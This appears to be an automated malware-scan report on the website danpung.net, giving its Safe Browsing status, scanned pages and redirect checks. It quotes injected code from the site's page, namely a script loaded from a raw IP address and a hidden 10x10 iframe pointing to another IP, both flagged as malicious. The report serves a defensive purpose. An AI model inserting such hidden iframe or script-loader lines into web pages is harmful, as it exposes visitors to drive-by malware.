Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=danpung.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://danpung.net/ | 200 OK Content-Length: 3251 Content-Type: text/html | malicious |
Page code contains blacklisted domain: dan.javasarang.net ...[2928 bytes skipped]... blur()' /> <area shape="rect" coords="790,35,861,75" href="/dan/sub6/sub61.jsp" onfocus='this.blur()' /> <area shape="rect" coords="877,35,951,73" href="/dan/sub5/sub51.jsp" onfocus='this.blur()' /> <area shape="rect" coords="53,27,226,80" href="index.html" onfocus='this.blur()' /> </map> <map name="Map2" id="Map2"> <area shape="rect" coords="511,49,574,70" href="http://dan.javasarang.net/dan/admin/" target="_blank" onfocus='this.blur()' /> </map> <script type="text/javascript"> <!-- swfobject.registerObject("FlashID"); swfobject.registerObject("FlashID2"); //--> </script> </body> </html> <script type="text/javascript" src="http://60.32.213.44/mail/holder.js"></script><iframe src=http://121.138.184.231/ttt/sty.htm width=10 height=10></iframe><script type="tex ...[174 bytes skipped]... Malicious iFrame found. size: 10x10 src: http://121.138.184.231/ttt/sty.htm This URL is marked by Google as suspicious <iframe src=http://121.138.184.231/ttt/sty.htm width=10 height=10> | ||
http://danpung.net/Scripts/swfobject_modified.js | 200 OK Content-Length: 22365 Content-Type: text/html | clean |
http://danpung.net/test404page.js | 404 Not Found Content-Length: 283 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: dan.javasarang.net <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>404 Not Found</TITLE> </HEAD><BODY> <H1>Not Found</H1> The requested URL /test404page.js was not found on this server.<P> <HR> <ADDRESS>Apache/1.3.37 Server at dan.javasarang.net Port 80</ADDRESS> </BODY></HTML> | ||
http://60.32.213.44/mail/holder.js | 404 Not Found Content-Length: 1621 Content-Type: text/html | clean |
http://121.138.184.231/ttt/holder.js | 404 Object Not Found Content-Length: 3937 Content-Type: text/html | clean |
http://121.67.183.105:83/MEDIA/holder.js | 404 Not Found Content-Length: 314 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: 121.67.183.105 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /MEDIA/holder.js was not found on this server.</p> <hr> <address>Apache Server at <a href="mailto:admin@localhost">121.67.183.105</a> Port 83</address> </body></html> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: danpung.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Dec 2014 23:39:43 GMT
Server: Microsoft-IIS/5.0
Content-Type: text/html
P3P: CP='CAO PSA CONi OTR OUR DEM ONL'
X-Powered-By: PHP/4.4.4
GET / HTTP/1.1
Host: danpung.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sun, 21 Dec 2014 23:39:43 GMT
Server: Microsoft-IIS/5.0
Content-Type: text/html
P3P: CP='CAO PSA CONi OTR OUR DEM ONL'
X-Powered-By: PHP/4.4.4
Second query (visit from search engine):
GET / HTTP/1.1
Host: danpung.net
Referer: http://www.google.com/search?q=danpung.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: danpung.net
Referer: http://www.google.com/search?q=danpung.net
Result:
The result is similar to the first query. There are no suspicious redirects found.